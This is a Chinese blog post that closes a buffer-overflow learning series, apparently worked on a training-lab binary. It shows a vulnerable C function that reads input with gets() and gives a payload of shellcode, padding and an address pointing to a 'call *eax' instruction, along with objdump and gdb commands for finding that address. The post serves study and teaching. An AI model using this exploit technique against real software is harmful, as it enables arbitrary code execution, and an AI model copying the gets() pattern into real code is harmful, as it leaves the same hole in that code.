缓冲区溢出之总结

最新推荐文章于 2024-03-24 17:00:00 发布
最新推荐文章于 2024-03-24 17:00:00 发布
阅读量828 收藏
点赞数
分类专栏: 总结 文章标签:
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38204481/article/details/77622188
版权

还有最后一个实验没写,觉得没必要了,在这里随便说一下就行了。

上代码:
char* getpath()

{

char buffer[64];

unsigned int ret;



printf("input path please:");

fflush(stdout);



gets(buffer);

ret = __builtin_return_address(0);

if ((ret & 0xb0000000) == 0xb0000000)

{

    printf("bzzzt (%p)\n", ret);

    _exit(1);

}



printf("got path %s\n", buffer);

return strdup(buffer);//这个函数的参数是一个数据指针,得到一组数据的副本,返回副本指针

}

int main(int argc, char** argv)

{

getpath();

return 0;

}
想一下之前说用retn可以让函数跳转到shellcode并执行,那返回到call是不是也能执行 O(∩_∩)O
strdup(buffer)有这个函数,只需要返回这个函数的eax存储的位置就行了,实际上这里直接返回到call eax就行
1.找该堆栈中gets函数到返回地址的大小。
2.找出该程序中的一个call *eax
这里的命令写法:
junk = (80-len(shellcode))*’A’
print shellcode + junk + ‘\x9f\x84\x04\x08’
具体用到的linux命令:
x /s $eax 查看eax寄存器内容,显示ascii码
objdump -d pwn8 | grep “call *%eax” 这里是查找objdump输出的内容,仅显示call *eax(为通配符要查找需要在前面加\而\才是反斜杠的意思)

总结:
从第一篇开始接触缓冲区溢出,第一,二篇主要是写汇编语言分析,收获挺大的,分析完看懂些简单函数不是问题
接下来从发现逐渐转变成了利用
发现这里介绍的无非就是strcpy函数和gets函数。很浅的发现
而利用,这里介绍了用数据覆盖数据,用数据覆盖地址,绕过保护。
当发现一个漏洞,我们可以利用的不止是该堆栈,能利用一切,本执行程序的所有东西,甚至本客户机上正在执行的一切进程,各种代码各种变量,找到地址一个retn就能访问

学到的还有linux命令,虽然很少,积少成多嘛

谁说 人们抬头望天空就是发现了一枚石子,而之后飞上宇宙只是把这枚石子捡起来。
漏洞的发现就像找到一枚石子。

九层台
关注
专栏目录
缓冲区溢出漏洞实验报告
10-15
1.本次实验为了方便观察汇编语句,我们需要在 32 位环境下作操作,因此实验之前需要做一些准备。 输入命令安装一些用于编译 32 位 C 程序的软件包 Sudo apt-get update
浅析缓冲区溢出
weixin_33751566的博客
08-13 792
最近一直在学习缓冲区溢出漏洞的攻击,但是关于这一块的内容还是需要很多相关知识的基础,例如编程语言及反汇编工具使用。所以研究透彻还需要不少的时间,这里简单的做一个学习的总结,通过具体的实验案例对缓冲区溢出进行简要的解析。汇编语言及编程语言是基础,其次是对反编译工具的使用:比如gdb、IDA pro、objdump等。汇编语言的学习可以看王爽...
实验三-Bufflab(缓冲区溢出攻击、buffbomb/buffbomb)实验总结
longzaizai_的博客
05-03 7099
实验准备工作和踩坑总结(实验过程中有一些坑总结在前边): 准备工作: 1.首先,我将userid设置为:sxl,如图所示: 正在上传…重新上传取消 因此可以得到专属于我的cookie:0x45f61b8d。 2.然后,因为在后续试验中我们要用到bufbomb的汇编代码,因此在终端依次输入命令: (1)ssh username@10.92.13.8连接到服务器 (2)objdump -d bufbomb > 1.txt (3)scp username@10.92.8:1.tx...
Win32漏洞分析与利用 栈缓冲区溢出实验总结
Tracy_yi的博客
05-30 1354
栈溢出 如果程序在处理用户数据时,未能对其大小进行恰当的限制,在进行复制、填充时没对这些数据限定边界,攻击者就可以通过精心设计的数据进行溢出覆盖,修改内存中数据、改变程序的执行流程。 在栈溢出漏洞中,最经典的是借助跳板的栈溢出方式。 左图是一个正常的栈,从高到低依次是:父函数的栈空间、作为返回地址的EIP、保存下来的栈指针EBP、若干局部变量和用于被攻击的缓冲区。 现有的C语言中许多标准函数(如strcpy)在现在看来已经不再是安全的了,利用strcpy讲数据复制到局部数组缓冲区时可以超过缓冲区区域,覆盖
缓冲区溢出实验
4ct10n
04-22 8669
缓冲区溢出是一种非常普遍、非常危险的漏洞,在各种操作系统、应用软件中广泛存在。利用缓冲区溢出攻击,可以导致程序运行失败、系统宕机、重新启动等后果。更为严重的是,可以利用它执行非授权指令,甚至可以取得系统特权,进而进行各种非法操作。
安全编程之缓冲区溢出.7z
08-20
**安全编程之缓冲区溢出** 在IT领域,安全编程是一项至关重要的技能,尤其是在系统和应用程序设计中。缓冲区溢出是其中最常见的安全漏洞之一,它可能导致数据丢失、程序崩溃,甚至恶意代码执行,对系统安全构成严重...
《网络安全技术》大作业:缓冲区溢出实验报告
12-27
一、缓冲区溢出原理 缓冲区溢出是因为在程序执行时数据的长度超出了预先分配的空间大小,导致覆盖了其他数据的分配区域,从而执行非授权指令,获取信息,取得系统特权进而进行各种非法操作导致程序运行失败、系统宕...
SafeStack:自动修补基于堆栈的缓冲区溢出漏洞
03-03
总结起来,SafeStack系统是在对抗缓冲区溢出攻击领域的创新尝试,它通过虚拟化技术和内存区域的保护,提供了改进的系统可用性和安全性。这项技术的研发和应用,为服务导向平台提供了一种新的安全防御机制,有助于...
2019网络空间安全国赛8080缓冲区溢出漏洞
12-28
2019年的"网络空间安全"国赛中,8080端口的缓冲区溢出问题成为了竞赛的重点之一。 8080端口通常用于HTTP代理服务,但在Linux环境中,这个端口也可以被各种其他服务所占用。在赛项中,参赛者首先需要进行的是对靶机...
计算机系统基础实验:缓冲区溢出攻击
catting的博客
04-21 8997
通过这次实验,学习到了缓冲区溢出的原理和机制,加深了对函数调用规则的理解,也加深了对栈帧结构的理解。课本上大致描述了栈保护机制,通过模拟缓冲区溢出攻击,了解了栈保护机制,也加深了对课本理论知识的理解。把理论付诸实践,提高了自己的动手能力。通过对这些原理的学习,也提醒我以后在自己编写代码的过程中,要避免写出类似的危险代码,避免不必要的损失。同时,我还学习到了程序运行时操作,了解了这种形式的安全性弱点的性质,以后编写代码时也要多加小心。
详解缓冲区溢出攻击(超级详细)
热门推荐
南七行者的博客
12-02 1万+
打印寄存器的值 AT&T汇编中,命令中可以指定操作范围,如pushb是将一个byte压栈,而pushw就是将一个word压栈,同样pushl就是压栈long(也就是双字)。
缓冲区溢出攻击不完全小结
break_cat的博客
01-12 444
前言 1.学习缓冲区溢出攻击需要有C语言和汇编的基础,以及一些操作系统知识 2.我是个菜鸡,文章是边查资料边写的,如发现文中有错误,很大可能就是写错了 3.本文无实例,只有很少的技巧,主要是小结一下相关知识 4.缓冲区溢出涉及到许多技术,请不断深入学习 向一个缓冲区中放置比分配的空间还多的数据就可能导致缓冲区溢出,正常的缓冲区溢出条件会导致段越界发生,利用这种情况可以达到访问目标系统的目的。(由于操作系统都默认启动了一些安全机制,传统的缓冲区溢出攻击已经不在管用了) 缓冲区溢出的主要原因在于忽视了对输入.
网络安全——缓冲区溢出攻击
VN520的博客
04-21 6600
什么是缓冲区?它是指程序运行期间,在内存中分配的一个连续的区域,用于保存包括字符数组在内的各种数据类型。所谓溢出,其实就是所填充的数据超出了原有的缓冲区边界,并非法占据了另一段内存区域。两者结合进来,所谓缓冲区溢出,就是由于填充数据越界而导致原有流程的改变,黑客借此精心构造填充数据,让程序转而执行特殊的代码,最终获取控制权。
网络安全威胁——缓冲区溢出攻击
最新发布
2201_75362610的博客
03-24 1291
(1)缓冲区缓冲区是一块连续的计算机内存区域,用于在将数据从一个位置移到另一位置时临时存储数据。这些缓冲区通常位于 RAM 内存中,可保存相同数据类型的多个实例,如字符数组。计算机经常使用缓冲区来帮助提高性能,大多数现代硬盘驱动器都利用缓冲优势来有效地访问数据,并且许多在线服务也使用缓冲区。例如,在线视频传送服务经常使用缓冲区以防止中断。流式传输视频时,视频播放器一次下载并存储 20% 的视频到缓冲区,然后从该缓冲区进行流式传输,当连接速度的小幅下降或快速的服务中断都不会影响视频流性能。
网络渗透与防护之缓冲区溢出介绍
weixin_30950237的博客
01-11 129
网络渗透与防护之缓冲区溢出介绍 一、前言: 最近在找pwn的学习资料,发现在学校的安全知识库里面,有老师录制的几节缓冲区溢出视频,决定好好学习一下。 二、概念: 1、缓冲区:缓冲区就是应用程序用来保存用户输入的数据、临时数据的内存空间 2、缓冲区溢出:如果用户输入的数据长度超出了程序为其分配的内存空间,这些数据就会覆盖程序为其它数据分配的内存空间,形成缓冲区溢出。...
【安全牛学习笔记】缓冲区溢出
weixin_34245169的博客
10-30 133
数据与代码边界不清,导致程序执行代码脚本:#! /bin/bashecho $1在终端中运行脚本,参数写;或|加上命令,会被系统执行 源码审计 逆向工程对编译后的文件反汇编 模糊测试安装包,对程序发送数值,监视反馈SLmail 安装后开放110,25,180,8376端口Xp上添加smtp的25端口,pop3的110端口DEP:阻止代码从数据页被执行ASLR:随机内...
缓冲区溢出
gogolyq的博客
08-23 459
缓冲区溢出的危害和应对方法
理解缓冲区溢出:原理与防护实战
总结来说,缓冲区溢出是程序员必须警惕的问题,它涉及内存管理、输入验证和安全编程原则。掌握其原理有助于开发安全的应用程序,减少潜在的攻击面。随着技术的进步,理解和应对这种漏洞的方法也在不断演进,但基本...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值